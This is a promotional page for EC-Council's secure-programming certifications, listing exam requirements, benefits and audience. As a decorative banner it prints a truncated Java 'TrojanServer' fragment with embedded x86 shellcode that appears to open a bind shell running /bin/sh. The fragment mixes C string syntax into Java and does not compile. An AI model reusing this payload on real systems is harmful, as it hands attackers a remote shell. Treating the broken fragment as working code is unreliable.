Home   Home Search Contact Us
Download Brochure eBook  Exam Job Roles Sample Tests CertificatesCode of EthicsTake Exam


Certification Levels

Consultant
Professional
Associate
E++ Certification
Ethical Hacker
CHFI
LPT
ECSA
ECSP/CSAD
Security5
 


Headline

There's no magic formula for e-business success. It requires vision, execution -- and an integrated, flexible technology infrastructure. That's why more and more companies are relying on EC-Council's accreditation of e-Business skills.

 
Virus warnings
 

 

 

EC-Council Certified Secure Programmer

Stop the Buffer Overflows. Stop the Hackers.
Start Writing Secure Code.

/**
* Trojan Horse server
* Accepts Remote command from client
*/

import java.net.*;
import java.io.*;

public class TrojanServer {
//------------------This is my SPE --------------------------------
public static void main(String[] args) throws IOException
{
//check if 'port number' is passed
if (!(args.length >= 1))
{
System.out.println("Usage: java TrojanServer <port>");
System.exit(0);
}
String port;
port = args[0];
TrojanServer b = new TrojanServer(port);

} //end main
//-----------------------------------------------------------------


//instance variables
ServerSocket ssock = null;
Socket sock = null;
int count = 0;


//constructor
public TrojanServer(String port)
{
//create the server socket
try {
ssock = new ServerSocket(Integer.parseInt(port));
} catch (Exception e) {

System.err.println("ERROR:Could not listen on port: " + port);
System.exit(1);
} //end catch

//Execution stops here until a client makes a connection
System.out.println("Waiting for a remote command from client....");

char remote[] =
"\xeb\x0a""1234567890"  /* buffer overflow code */
"\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6"
"\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50"
"\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a"
"\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31"
"\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0"
"\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80"
"\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80\xa1\x5f\x66\x6e\x69";
...
...
...

The essential skills to pre-empting bugs in code and building secure applications

Introduction                                                                                  

EC-Council’s Certified Secure Programmer and Certified Secure Application Developer are being offered to provide the essential and fundamental skills to programmers and application developers in secure programming.  The most prevalent reason behind buggy code and vulnerabilities being exploited by hackers and malicious code is the lack of adoption of secure coding practices. 

The Certified Secure Programmer and Certified Secure Application Developer  programs will ensure that programmers and developers are exposed to the inherent security drawbacks in various programming languages or architectures. They will be further trained  to exercise secure programming practices to overcome these inherent drawbacks in order to pre-empt bugs from the code.

Certified Secure Programmer lays the basic foundation required by all application developers and development organizations to produce applications with greater stability and posing lesser security risks to the consumer. The Certified Secure Application Developer standardizes the knowledge base for application development by incorporating the best practices followed by experienced experts in the various domains.

The distinguishing aspect of E|CSP and C|SAD is that unlike vendor or domain specific certifications, it exposes the aspirant to various programming languages from a security perspective. This drives greater appreciation for the platform / architecture / language one specializes on as well as an overview on related ones.

Requirements

1.       To achieve EC-Council Certified Secure Programmer (E|CSP), pass EC-Council’s Certified Secure Programmer  312-92 exam.
 

2.       To achieve EC-Council Certified Secure Application Developer (C|SAD), achieve  an application development certification from any of the following vendors and pass EC-Council’s Certified Secure Programmer  312-92 exam.

For Linux: LCE / LCA / RHCE / LPI certification

For Microsoft: MCAD / MCSD certification

For Sun:  SCJD / SCEA certification

For Oracle: OCP certification ( DBA)

For IBM: Websphere certification

Benefits

1.       Exposure to a wide range of programming languages and train on well endorsed secure coding practices

2.       Improve your employability in development organizations

3.       Exposure to application development across platforms

4.       Enhance skills on writing better code and improve efficiency

5.       Build secure applications

Target Audience

The E|CSP certification is intended for programmers who are responsible for designing and building secure Windows/Web based applications with .NET/Java Framework. It is designed for developers who have C#, C++ and Java development skills.

 

E|CSP Training

Training for the certified secure programmer certification is available at EC-Council Accredited Training Centers across the world. Please contact us for locating a training center close to you.

 

 


 

 


 


 
Copyright Privacy